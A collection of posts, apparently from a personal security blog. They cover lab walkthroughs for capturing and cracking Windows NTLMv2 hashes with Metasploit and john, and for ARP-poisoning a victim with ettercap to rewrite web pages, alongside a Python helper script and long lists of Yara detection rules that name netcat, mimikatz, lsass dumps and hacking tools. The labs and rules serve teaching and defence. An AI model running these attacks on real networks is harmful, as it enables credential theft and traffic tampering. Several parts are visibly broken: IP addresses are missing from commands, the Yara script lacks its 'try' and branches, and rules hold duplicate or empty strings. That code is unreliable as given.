Friday, December 27, 2019

metasploit smb capture password hashes

create 2 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
       will be the victim trying to access the web server

1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as
4.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 netmask up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module

> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt

7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
      windows will popup an authentication prompt, enter a user & password  (e.g. guy, password)

8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt 
     type exit to exit metasploit
     run john against the newly captured file
       > john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt

     if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen

compare dhcp leases to active directory pcs

python script

# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
#               Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
 notInADCount = 0
 searchedCount = 0
 for dhcpHost in dhcpFileHandle:
  foundIt = 0
  with open(adFile, 'r') as adFileHandle:
   for adHost in adFileHandle: 
    adHost = adHost.lower().strip()
    dhcpHost = dhcpHost.lower().strip()
    if dhcpHost == adHost:
     foundIt = 1
  searchedCount = searchedCount + 1
  if foundIt == 0:
   print(dhcpHost, end='', file=notInADHandle)
   notInADCount = notInADCount + 1
   print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))

ettercap http replace man-in-the-middle full example

create 3 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
       will be hosting the website the victim wants to access
3.) windows VICTIM
       will be the victim trying to access the web server

1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as
4.) configure kali linux WEB SERVER to similar ip address as windows
       ifconfig eth0 netmask up
5.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 netmask up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
      then launch python simple http server on port 8001
             python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
     you will see the text
        "this is fun"


9.) on kali linux ATTACKER
      create an ettercap filter file with a text editor with this content and save as "fun.filter"
          if (ip.proto == TCP) {
           if (tcp.dst == 8001 || tcp.src == 8001) {
             if (search(, "Accept-Encoding")) {
              replace("Accept-Encoding", "Accept-Nothing!");
              msg("removed encoding");
            if (search(, "fun")) {
             replace("fun", "evil");
             msg("fun is now evil");
     NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response

     next compile the filter
         etterfilter fun.filter -o fun.ef
     next run ettercap using the filter and arp spoofing
         ettercap -tq -M arp:remote -F fun.ef / /
10.) on windows VICTIM
       reload the website
       you will now see the text
         "this is evil"

11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit

Monday, December 23, 2019

update datetime on linux

# ntpdate

syncs with internet time

navigator DOM keys

document.write("navigator.appName = " + navigator.appName + "<br/>")
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");

sample output
Google Chrome on 64bit Windows 10
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107

Internet Explorer on 64bit Windows 10
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
Microsoft Edge on 64bit Windows 10
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = 
FireFox ESR on 64bit Kali Linux

navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor = 
navigator.vendorSub = 

Friday, December 20, 2019

Virtual Box local contained lab, VM to VM

network for both kali & windows
"internal network"

on kali type
ifconfig eth0 169.254.18.XXX netmask up

on kali
ping windows

on windows
ping kali

Thursday, December 5, 2019

# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file

import os
import subprocess
import traceback
import argparse
import sys

yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""

arguments = argparse.ArgumentParser(" -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()

with open(settings.inputFileName, "r") as lines:
 for line in lines:
  line = line.rstrip()
  if settings.debug:
   print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
  if settings.status:
   if (lineNumber % 50) == 0 and lineNumber != 0:
    print("STATUS: processing line %s" % (str(lineNumber)))
  with open(tempFileName,"w") as tempfile:
   yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
   if settings.debug:
    print("ABOUT TO RUN: %s" % yaraCommand)
   if settings.debug:
    pause = input()
   if settings.debug:
    print("STARTED: YARA")
   output = subprocess.check_output(yaraCommand, shell=True)
   if settings.debug:
    print("OUTPUT: %s" % str(output))
  except Exception as e:
   error = str(e)
   print("COMMAND: %s" % yaraCommand)
   print("OUTPUT: %s" % output)
   print("ERROR: %s" % error)
   output = ""
  if output is None or len(output) == 0:
   if settings.debug:
    print("MATCHES: 0 (no output)")
   output = str(output).replace("b'","").rstrip()
   if output[-1:] == "'":
    output = output[:-1]
   if tempFileName in output:
    if settings.debug:
     print("MATCHES: 1+")
    print("MATCH LINE NUMBER %s:" % str(lineNumber))
    print(" LINE: %s" + line)
    print(" YARA:")
    for row in output.split("\\r\\n"):
     row = row.replace("\\r\\n", "")
     if row.startswith("0x"):
      print("   %s" % row)
      print("  %s" % row)
    print("MATCHES: 0 (with output)")
  lineNumber = lineNumber + 1

Neo23x0 Sigma Proxy Rules converted to simple Yara

rule Neo23x0SigmaUserAgentMatch
 author = "@neonprimetime"
 description = "@Neo23x0 Proxy User Agent Rules"
 $string1 = "(compatible;MSIE"
 $string2 = "BFAC"
 $string3 = "BGroom"
 $string4 = "CholTBAgent"
 $string5 = "Havij"
 $string7 = "adlib/"
 $string8 = "arachni/"
 $string9 = "asd"
 $string10 = "brutus"
 $string11 = "cgichk"
 $string12 = "changhuatong"
 $string13 = "crimscanner/"
 $string14 = "inspath"
 $string15 = "mdms"
 $string16 = "metis"
 $string17 = "pxyscand"
 $string18 = "tiny"
 $string19 = "vega/"
 $string20 = "whcc/"
 $string21 = "zmeu"
 $string22 = "(Charon; Inferno)"
 $string23 = "(hydra)"
 $string24 = ".0;Windows NT"
 $string25 = "<|>"
 $string26 = "Bot"
 $string27 = "Microsoft Internet Explorer"
 $string28 = "Telegram"
 $string29 = "absinthe"
 $string30 = "bsqlbf"
 $string31 = "core-project/1.0"
 $string32 = "datacha0s"
 $string33 = "dirbuster"
 $string34 = "domino hunter"
 $string35 = "dotdotpwn"
 $string36 = "exploit"
 $string37 = "floodgate"
 $string38 = "get-minimal"
 $string39 = "gootkit auto-rooter scanner"
 $string40 = "grendel-scan"
 $string41 = "internet ninja"
 $string42 = "jaascois"
 $string43 = "masscan"
 $string44 = "morfeus fucking scanner"
 $string45 = "mysqloit"
 $string46 = "n-stealth"
 $string47 = "nsauditor"
 $string48 = "pangolin"
 $string49 = "pmafind"
 $string50 = "security scan"
 $string51 = "springenwerk"
 $string52 = "sql power injector"
 $string53 = "sqlmap"
 $string54 = "sqlninja"
 $string55 = "teh forest lobster"
 $string56 = "toata dragostea"
 $string57 = "uil2pn"
 $string58 = "voideye"
 $string59 = "webshag"
 $string60 = "webvulnscan"
 $string61 = "wordpress hash grabber"
 $string62 = "zeroup"
 $string63 = "AutoIt"
 $string64 = "CertUtil URL Agent"
 $string65 = "DotDotPwn v2.1"
 $string66 = "FHScan Core"
 $string67 = "HttpBrowser/1.0"
 $string68 = "IczelionDownLoad"
 $string69 = "Internet Explorer"
 $string75 = "Moxilla"
 $string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
 $string79 = "Mozilla v5.1"
 $string80 = "Mozilla/1.0"
 $string81 = "Mozilla/2.0"
 $string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
 $string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
 $string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
 $string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
 $string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
 $string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)"
 $string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
 $string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
 $string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
 $string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
 $string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
 $string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
 $string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
 $string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
 $string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
 $string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
 $string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
 $string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
 $string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
 $string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
 $string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
 $string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
 $string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
 $string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
 $string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
 $string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
 $string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
 $string110 = "Mozilla/4.0 (compatible; RMS)"
 $string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
 $string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
 $string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
 $string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
 $string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
 $string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
 $string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
 $string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/ (WinHTTP/5.1) like Gecko"
 $string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
 $string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
 $string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
 $string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
 $string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
 $string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
 $string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
 $string128 = "Mozilla/5.0 (Windows NT 9;"
 $string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/ Safari/525.13"
 $string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Firefox/3.6.13 GTB7.1"
 $string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
 $string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
 $string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv: Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
 $string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
 $string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
 $string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +"
 $string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0"
 $string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
 $string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
 $string140 = "Mozilla/5.0 WinInet"
 $string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
 $string143 = "Netscape"
 $string144 = "O/9.27 (W; U; Z)"
 $string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
 $string147 = "RookIE/1.0"
 $string148 = "SIPDROID"
 $string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
 $string150 = "Sametime Community Agent"
 $string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
 $string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
 $string154 = "X-FORWARDED-FOR"
 $string155 = "XMRig"
 $string157 = "backdoorbot"
 $string158 = "ccminer"
 $string159 = "hots scot"
 $string160 = "nocase"
 $string161 = "nsis_inetc (mozilla)"
 $string162 = "ruler"
 $string163 = "sample"
 $string164 = "user-agent"
 1 of them

Generic Triage Yara Rules

rule RemoteControlUrlAccessed
 author = "@neonprimetime"
 description = "Cloud Remote Control Url Accessed"
 $string0 = "teamviewer" nocase
 $string1 = "splashtop" nocase
 $string2 = "ammyy" nocase
 $string3 = "mikogo" nocase
 $string4 = "uvnc" nocase
 $string5 = "gbchcmhmhahfdphkhkmpfmihenigjmpp" nocase
 $string6 = "logmein" nocase
 $string7 = "" nocase
 $string8 = "realvnc" nocase
 $string9 = "dameware" nocase
 $string10 = "dwservice" nocase
 $string11 = "anydesk" nocase
 1 of them

rule WebMailUrlAccessed
 author = "@neonprimetime"
 description = "Web Mail Url Accessed"
 $string0 = "" nocase
 $string1 = "" nocase
 $string2 = "" nocase
 $string3 = "" nocase
 $string4 = "" nocase
 $string5 = "" nocase
 $string6 = "" nocase
 $string7 = "" nocase
 $string8 = "" nocase
 $string10 = "" nocase
 $string11 = "" nocase
 $string12 = "" nocase
 $string13 = "" nocase
 $string14 = "" nocase
 1 of them

rule CloudFileStorageUrlAccessed
 author = "@neonprimetime"
 description = "Cloud File Storage Url Accessed"
 $string0 = "" nocase
 $string1 = "" nocase
 $string2 = "" nocase
 $string3 = "" nocase
 $string4 = "" nocase
 $string5 = "" nocase
 $string6 = "" nocase
 $string7 = "" nocase
 $string8 = "" nocase
 $string9 = "" nocase
 $string10 = "" nocase
 $string11 = "" nocase
 $string12 = "" nocase
 $string13 = "" nocase
 $string14 = "" nocase
 1 of them

rule LateralMovementAttempt
 author = "@neonprimetime"
 description = "Lateral Movement Attempt"
 $string0 = "mstsc" nocase
 $string1 = "psexec" nocase
 $string2 = "\\nc.exe" nocase
 $string3 = "/nc.exe" nocase
 $string2 = "\\nc64.exe" nocase
 $string3 = "/nc64.exe" nocase
 $string2 = "\\netcat.exe" nocase
 $string3 = "/netcat.exe" nocase
 $string4 = "putty.exe" nocase
 $string5 = "mobax" nocase
 $string6 = "securecrt" nocase
 $string7 = "ssh.exe" nocase
 $string8 = "winrs" nocase
 1 of them

rule ShortExecutableName
 author = "@neonprimetime"
 description = "Short Executable Name"
 $string0 = "/0.exe" nocase
 $string1 = "/1.exe" nocase
 $string2 = "/2.exe" nocase
 $string3 = "/3.exe" nocase
 $string4 = "/4.exe" nocase
 $string5 = "/5.exe" nocase
 $string6 = "/6.exe" nocase
 $string7 = "/7.exe" nocase
 $string8 = "/8.exe" nocase
 $string9 = "/9.exe" nocase
 $string10 = "\\0.exe" nocase
 $string11 = "\\1.exe" nocase
 $string12 = "\\2.exe" nocase
 $string13 = "\\3.exe" nocase
 $string14 = "\\4.exe" nocase
 $string15 = "\\5.exe" nocase
 $string16 = "\\6.exe" nocase
 $string17 = "\\7.exe" nocase
 $string18 = "\\8.exe" nocase
 $string19 = "\\9.exe" nocase
 $string20 = "/a.exe" nocase
 $string21 = "/b.exe" nocase
 $string22 = "/c.exe" nocase
 $string23 = "/d.exe" nocase
 $string24 = "/e.exe" nocase
 $string25 = "/f.exe" nocase
 $string26 = "/g.exe" nocase
 $string27 = "/h.exe" nocase
 $string28 = "/i.exe" nocase
 $string29 = "/j.exe" nocase
 $string30 = "/k.exe" nocase
 $string31 = "/l.exe" nocase
 $string32 = "/m.exe" nocase
 $string33 = "/n.exe" nocase
 $string34 = "/o.exe" nocase
 $string35 = "/p.exe" nocase
 $string36 = "/q.exe" nocase
 $string37 = "/r.exe" nocase
 $string38 = "/s.exe" nocase
 $string39 = "/t.exe" nocase
 $string40 = "/u.exe" nocase
 $string41 = "/v.exe" nocase
 $string42 = "/w.exe" nocase
 $string43 = "/x.exe" nocase
 $string44 = "/y.exe" nocase
 $string45 = "/z.exe" nocase
 $string46 = "\\a.exe" nocase
 $string47 = "\\b.exe" nocase
 $string48 = "\\c.exe" nocase
 $string49 = "\\d.exe" nocase
 $string50 = "\\e.exe" nocase
 $string51 = "\\f.exe" nocase
 $string52 = "\\g.exe" nocase
 $string53 = "\\h.exe" nocase
 $string54 = "\\i.exe" nocase
 $string55 = "\\j.exe" nocase
 $string56 = "\\k.exe" nocase
 $string57 = "\\l.exe" nocase
 $string58 = "\\m.exe" nocase
 $string59 = "\\n.exe" nocase
 $string60 = "\\o.exe" nocase
 $string61 = "\\p.exe" nocase
 $string62 = "\\q.exe" nocase
 $string63 = "\\r.exe" nocase
 $string64 = "\\s.exe" nocase
 $string65 = "\\t.exe" nocase
 $string66 = "\\u.exe" nocase
 $string67 = "\\v.exe" nocase
 $string68 = "\\w.exe" nocase
 $string69 = "\\x.exe" nocase
 $string70 = "\\y.exe" nocase
 $string71 = "\\z.exe" nocase
 1 of them

rule PolicyViolation
 author = "@neonprimetime"
 description = "Policy Violation"
 $string0 = "disableuac" nocase
 1 of them

rule LivingOffLandCommand
 author = "@neonprimetime"
 description = "Living Off the Land Command"
 $string0 = "mshta.exe" nocase
 $string1 = "nbstat.exe" nocase
 $string5 = "/query.exe" nocase
 $string6 = "\\query.exe" nocase
 $string8 = "bitsadmin.exe" nocase
 $string9 = "curl.exe" nocase
 $string10 = "wget.exe" nocase
 $string11 = "systeminfo.exe" nocase
 $string12 = "certutil.exe" nocase
 1 of them

rule PhishingAttachmentThemePossible
 author = "@neonprimetime"
 description = "Phishing Attachment Theme Possible"
 $string0a = "invoice." nocase
 $string0b = "invoice " nocase
 $string1 = "factura" nocase
 $string2 = "wiretransfer" nocase
 $string4a = "payment" nocase
 $string4b = "payment." nocase
 $string6a = "eFAX " nocase
 $string6b = "eFAX." nocase
 $string7 = "Fattura" nocase
 $string8 = "Enquiry" nocase
 $string9 = "QUOTATION" nocase
 $string10 = "receipt " nocase
 $string10 = "receipt." nocase
 $string11a = "payroll." nocase
 $string11b = "payroll " nocase
 $string12 = "PO#" nocase
 $string13 = "Proforma" nocase
 $string14 = "Purchase." nocase
 $string14 = "Purchase " nocase
 $string14 = "PurchaseOrder" nocase

 1 of them

rule ClearTextPasswordFile
 author = "@neonprimetime"
 description = "Clear Text Password File"
 $string0 = "password.txt" nocase
 $string1 = "pwd.txt" nocase
 $string2 = "passwd.txt" nocase
 $string3 = "password.doc" nocase
 $string4 = "pwd.doc" nocase
 $string5 = "passwd.doc" nocase
 $string6 = "password.xls" nocase
 $string7 = "pwd.xls" nocase
 $string8 = "passwd.xls" nocase
 $string9 = "passwords.txt" nocase
 $string10 = "pwds.txt" nocase
 $string11 = "passwds.txt" nocase
 $string12 = "passwords.doc" nocase
 $string13 = "pwds.doc" nocase
 $string14 = "passwds.doc" nocase
 $string15 = "passwords.xls" nocase
 $string16 = "pwds.xls" nocase
 $string17 = "passwds.xls" nocase
 $string18 = "web.config" nocase
 $string19 = "application.config" nocase
 1 of them

rule AdminUrlAccessed
 author = "@neonprimetime"
 description = "Admin Web Pages"
 $string0 = "/admin/" nocase
 $string1 = "/wp-admin/" nocase
 1 of them

rule HackingToolFound
 author = "@neonprimetime"
 description = "Hacking Tool Found"
 $string0 = "kali.exe" nocase
 $string2 = "wireshark" nocase
 $string3 = "bloodhound" nocase
 $string4 = "obfuscation" nocase
 $string5 = "shellcode" nocase
 $string6 = "keylogger" nocase
 $string7 = "bypassuac" nocase
 $string8 = "tokenmanipulation" nocase
 $string10 = "passhash" nocase
 $string11 = "kerberoast" nocase
 $string12 = "ninja" nocase
 $string13 = "memorynps" nocase
 $string14 = "metasploit" nocase
 $string15 = "smbexec" nocase
 $string16 = "gpppassword" nocase
 $string17 = "arpscan" nocase
 $string18 = "dnscat" nocase
 $string19 = "aircrack" nocase
 $string20 = "bulletspassview" nocase
 $string21 = "chromepass" nocase
 $string22 = "credentialsfileview" nocase
 $string23 = "echo.exe" nocase
 $string24 = "hydra.exe" nocase
 $string25 = "iepv.exe" nocase
 $string26 = "inssidersetup" nocase
 $string28 = "mailpv.exe" nocase
 $string29 = "ministumblersetup" nocase
 $string33 = "netpass.exe" nocase
 $string34 = "netstumbler" nocase
 $string35 = "nltest.exe" nocase
 $string36 = "ophcrack" nocase
 $string37 = "rdpv.exe" nocase
 $string38 = "setspn" nocase
 $string39 = "sniffpass" nocase
 $string40 = "vaultpasswordview" nocase
 $string41 = "\\ver.exe" nocase
 $string42 = "vncpassview" nocase
 $string43 = "webbrowserpassview" nocase
 1 of them

rule HackingCodeFound
 author = "@neonprimetime"
 description = "Hacking Code Found"
 $string0 = "WriteProcessMemory" nocase
 $string1 = "VirtualAlloc" nocase
 $string2 = "SetWindowsHook" nocase
 $string3 = "SHCreateThread" nocase
 $string4 = "FromBase64String" nocase
 $string5 = "PromptForCredential" nocase
 $string6 = "AdjustTokenPrivileges" nocase
 $string7 = "KerberosRequestorSecurityToken" nocase
 $string8 = "UnsafeNativeMethods" nocase
 $string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
 $string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
 $string11 = "TOKEN_IMPERSONATE" nocase
 $string12 = "TOKEN_ELEVATION" nocase
 $string13 = "TOKEN_ALL_ACCESS" nocase
 1 of them

rule PasswordDumpAttempt
 author = "@neonprimetime"
 description = "Password Dump Temp"
 $string0 = "mimikatz" nocase
 $string1 = "procdump" nocase
 $string3 = "hashdump" nocase
 $string4 = "pwdump" nocase
 $string5 = "lsadump" nocase
 1 of them

rule ExternalDriveAccessed
 author = "@neonprimetime"
 description = "External Drive Accessed"
 $string4 = "file:///f:/" nocase
 $string6 = "file:///g:/" nocase
 $string8 = "mfeprom" nocase
 1 of them

rule HackerOutputFile
 author = "@neonprimetime"
 description = "Hacker Output Files"
 $string0 = "acls.csv" nocase
 $string1 = "bloodhound.csv" nocase
 $string2 = "dump.csv" nocase
 $string3 = "dump.xml" nocase
 $string4 = "" nocase
 $string5 = "firewall.txt" nocase
 $string6 = "group_memberships.csv" nocase
 $string7 = "hashdump.txt" nocase
 $string8 = "local_admins.csv" nocase
 $string9 = "lsadump.txt" nocase
 $string10 = "lsass.dmp" nocase
 $string11 = "lsassdump.dmp" nocase
 $string12 = "mimikatz.xls" nocase
 $string13 = "mini.dmp" nocase
 $string14 = "netscan.xml" nocase
 $string15 = "nmap.csv" nocase
 $string16 = "nmap.txt" nocase
 $string17 = "nmap.xml" nocase
 $string18 = "openvas.csv" nocase
 $string19 = "pwdump.txt" nocase
 $string20 = "secretsdump.txt" nocase
 $string21 = "targets.txt" nocase
 $string22 = "trusts.csv" nocase
 $string23 = "user_sessions.csv" nocase
 $string24 = "bloodhound.bin" nocase
 $string25 = ".gnmap" nocase
 $string26 = ".nessus" nocase
 $string27 = ".nmap" nocase
 $string28 = "p0wn" nocase
 1 of them

rule HackerUrl
 author = "@neonprimetime"
 description = "Hacker Url"
 $string1 = "kali." nocase
 $string2 = "/kali/" nocase
 $string3 = "kali-" nocase
 $string4 = "backbox." nocase
 $string5 = "/backbox/" nocase
 $string6 = "backbox-" nocase
 $string7 = "blackarch." nocase
 $string8 = "/blackarch/" nocase
 $string9 = "blackarch-" nocase
 $string10 = "caine-live." nocase
 $string11 = "/caine-live/" nocase
 $string12 = "caine-live-" nocase
 $string13 = "deftlinux." nocase
 $string14 = "/deftlinux/" nocase
 $string15 = "deftlinux-" nocase
 $string16 = "parrotsec." nocase
 $string17 = "/parrotsec/" nocase
 $string18 = "parrotsec-" nocase
 $string19 = "altlinux./altlinux/" nocase
 $string20 = "altlinux-" nocase
 $string21 = "digi77." nocase
 $string22 = "/digi77/" nocase
 $string23 = "digi77-" nocase
 $string24 = ".paterva." nocase
 $string25 = "portswigger." nocase
 $string26 = "exploit-db." nocase
 $string27 = "/exploit-db/" nocase
 $string28 = "exploit-db-" nocase
 $string29 = "" nocase
 $string30 = "/" nocase
 $string31 = "" nocase
 $string32 = "/" nocase
 $string33 = "" nocase
 $string34 = "" nocase
 $string35 = "/" nocase
 $string36 = "" nocase
 $string37 = "/archstrike/" nocase
 $string38 = "archstrike-" nocase
 1 of them

rule PUPSoftware
 author = "@neonprimetime"
 description = "Potentially Unwanted Software"
 $string0 = "adusetup" nocase
 $string1 = "advanced driver" nocase
 $string2 = "anytimeastrology" nocase
 $string3 = "aplusgamer" nocase
 $string4 = "apnsetup" nocase
 $string5 = "apnstub" nocase
 $string6 = "ascsetup" nocase
 $string7 = "astromenda" nocase
 $string8 = "atozmanuals" nocase
 $string9 = "atwrun" nocase
 $string10 = "audiotoaudio" nocase
 $string11 = "bringmesports" nocase
 $string12 = "bytefence" nocase
 $string13 = "calendarspark" nocase
 $string14 = "ccleaner" nocase
 $string15 = "citysearch" nocase
 $string16 = "convertpdfsnowtooltab" nocase
 $string17 = "coupon companion" nocase
 $string18 = "couponscom" nocase
 $string19 = "cursormania" nocase
 $string20 = "dailybibleguide" nocase
